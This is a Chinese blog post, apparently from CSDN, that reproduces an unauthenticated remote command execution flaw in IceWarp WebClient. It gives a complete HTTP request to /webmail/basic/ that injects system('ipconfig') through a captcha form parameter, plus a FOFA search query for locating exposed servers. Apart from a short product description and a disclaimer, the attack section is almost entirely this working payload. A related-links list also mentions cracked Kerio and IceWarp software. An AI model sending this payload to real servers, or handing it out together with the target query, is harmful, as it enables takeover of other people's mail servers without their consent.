【漏洞复现】IceWarp WebClient basic 远程命令执行漏洞

最新推荐文章于 2024-07-25 09:58:57 发布
最新推荐文章于 2024-07-25 09:58:57 发布
阅读量325 收藏
点赞数 12
分类专栏: 漏洞复现 文章标签: 安全 分布式 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/138439440
版权

0x01 产品简介

IceWarp WebClient是一个适用于所有规模组织的企业级电子邮件、协作和移动解决方案。

0x02 漏洞概述

IceWarp WebClient存在远程代码执行漏洞,未授权的攻击者可以通过该漏洞远程执行代码,从而控制服务器。

0x03 测绘语句

IceWarp WebClient

0x04 漏洞复现

POST /webmail/basic/ HTTP/1.1

Host:

Content-Type: application/x-www-form-urlencoded



_dlg[captcha][target]=system(\'ipconfig\')\

0x05 影响范围

fofa:body="Powered by IceWarp"

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

从不学安全
关注
  • 12
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
web漏洞远程命令/代码执行
qq_56438857的博客
07-30 907
总结了常见的远程命令/代码执行漏洞的相关知识点。主要包括管道符,远程代码执行远程系统命令执行
远程命令执行漏洞原理,以及防护绕过方式
Scalzdp的专栏
11-21 1419
今天分享了远程执行指令的原理和如何进行远程执行指令漏洞的利用和绕过方法,远程命令执行漏洞危害性特别大,攻击者可以利用远程命令执行漏洞给运营团队带来如下一些危害:继承Web服务程序的权限去执行系统命令或读写文件、反弹shell、控制整个网站甚至服务器、进一步内网渗透。在防御的过程我们可以通过加强对用户输入的验证:比如限制输入内容,其次,采用最小权限原则,将程序运行权限限制在最低限度。
Icewarp Web Mail存在多个安全漏洞
风信子的专栏
02-19 1657
 受影响系统:Icewarp Web Mail 5.3.2Icewarp Web Mail 5.3.0描述:--------------------------------------------------------------------------------MERAK Mail Server使用Icewarp Web Mail作为WEB邮件系统。Icewa
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
weixin_72543266的博客
04-22 1520
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
Icewarp邮件系统5分钟灾难恢复
icewarp76的专栏
04-30 573
需求概述 用过Exchange/Domino邮件系统的都深感灾难恢复的复杂及麻烦,Icewarp邮件服务器具备Exchange/Domino系统无法比拟的5分钟灾难恢复功能,方法如下: 管理员只需定期导出Icewarp邮件服务器的MCB文件,如图: 实现方法 备份一个.mcb的文件,或者是如下图设置自动备份, Icewarp邮件服务器会按照你的计划自动备份系统设置,在硬件或者系统故障
爱思华宝 IceWarp V12 拥有无限可能的企业电子邮件及协作平台
IceWarpChina的博客
06-15 1758
爱思华宝 IceWarp V12   拥有无限可能的企业电子邮件及协作平台 爱思华宝 V12包括电子邮件、日历、文档、电子表格、演示文稿、TeamChat,即时通讯,语音/视频通话和安全的在线云存储在内的完整的生产力套件。     爱思华宝 V12 应用最新的开发技术,专为未来而设计 HTML5 标准桌面级应用体验 W
数据库语法整理及WAF绕过方式
RuoLi_s的博客
09-30 2292
关系型数据库 关系型数据库:指采用了关系模型来组织数据的数据库。 直白的说就是:关系型数据库最典型的数据结构是表,由二维表及其之间的联系所组成的一个数据组织 当今主流的关系型数据库有:Oracle,Microsoft SQL Server,MySQL,PostgreSQL,DB2, Microsoft Access, SQLite,MariaDB Oracle Oracle特性: select id,contents,time from news where news_id=1 ① union ② sele
Linux下搭建IceWarp邮件服务器教程
u011509025的专栏
07-25 3043
一、前期准备 1、硬件:最低配置,PIII 及以上系列处理器,512M 内存,10/100M 网卡; 2、操作系统:Redhat AS4/5,要安装Redhat自带的Mysql包;(其他的Linux版本如Fedora、SUSE等也可以) 3、互联网接入,最好是有固定IP; 4、申请一个域名,并做好DNS解析; 二、安装Icewarp Merak 邮件系统(操作系统为R
IceWarp 即时通讯(IM)服务
恒基杰业
01-06 1597
ICEWARP 即时通讯(IM)服务 需求概述 爱思华宝的企业用户在与各部门同事联系时,希望有类似于QQ的即时沟通工具,以方便日常工作。   功能介绍 IceWarp Merak  邮件系统自带了即时通讯(IM)服务模块,即时通讯功能类似于 MSN 、QQ 的即时聊天工具,并且能与 MSN 、ICQ 、雅虎通等其他工具互通,适合企业内部建立通讯平台,而且通讯记录服务器存档,便于行政管理。
IceWarp Screen Sharing-crx插件
04-02
此扩展允许您将屏幕分享给Icewarp WebClient中的其他用户。 Icewarp Webclient是一个包含消息传递通信的一体化集线器,无论是电子邮件,即时消息, 语音,在线会议,文档管理等等。 从您的桌面或On-go访问,您可以...
破解kerio 系列软件,以及IceWarp Essentials 的好东东
10-17
破解 kerio 系列软件,以及 IceWarp Essentials 的好东东。
icewarp_webmail_vulns.nasl
11-08
icewarp_webmail_vulns
IceWarp屏幕共享「IceWarp Screen Sharing」-crx插件
03-08
这个扩展允许您在IceWarp WebClient中与其他用户分享您的屏幕。 爱思华宝WebClient是您的消息传递通信的多功能集线器,无论是电子邮件,即时消息传递,语音,在线会议,文档管理等等。 无论是从桌面还是在旅途中均可...
icewarp_webmail_vulns3.nasl
11-08
icewarp_webmail_vulns3
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 730
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
科普文:Linux系统安全加固指南
最新发布
为无为,事无事,味无味。
07-25 1051
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
分布式相关理论详解
zhifou123456的博客
07-25 1041
分布式系统就是将整个系统根据业务拆分多个微服务,服务之间通过Rpc进行通信。集群是将多个相同应用部署到不同的集群模式上,本质上是为了提高吞吐量已经保证高可用性。CAP理论是分布式系统的理论基础,即一个分布式系统最多满足CAP这三项中的两项。即只能满足一致性(Consistance)、可用性(Aviablity)、分区容忍性(Partition tolerance)中的两项。线性一致性是要求最高的一种一致性,他要求无论从哪个副本读取数据,一定读到的是当前整个集群里面最新的数据。
MyRedis分布式加锁解锁
a876106354的博客
07-24 486
以下是一个简单的示例,展示了如何使用StackExchange.Redis客户端在C#中实现分布式锁和解锁。首先,确保已经安装了StackExchange.Redis库。在C#中使用MyRedis实现分布式锁通常涉及到。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值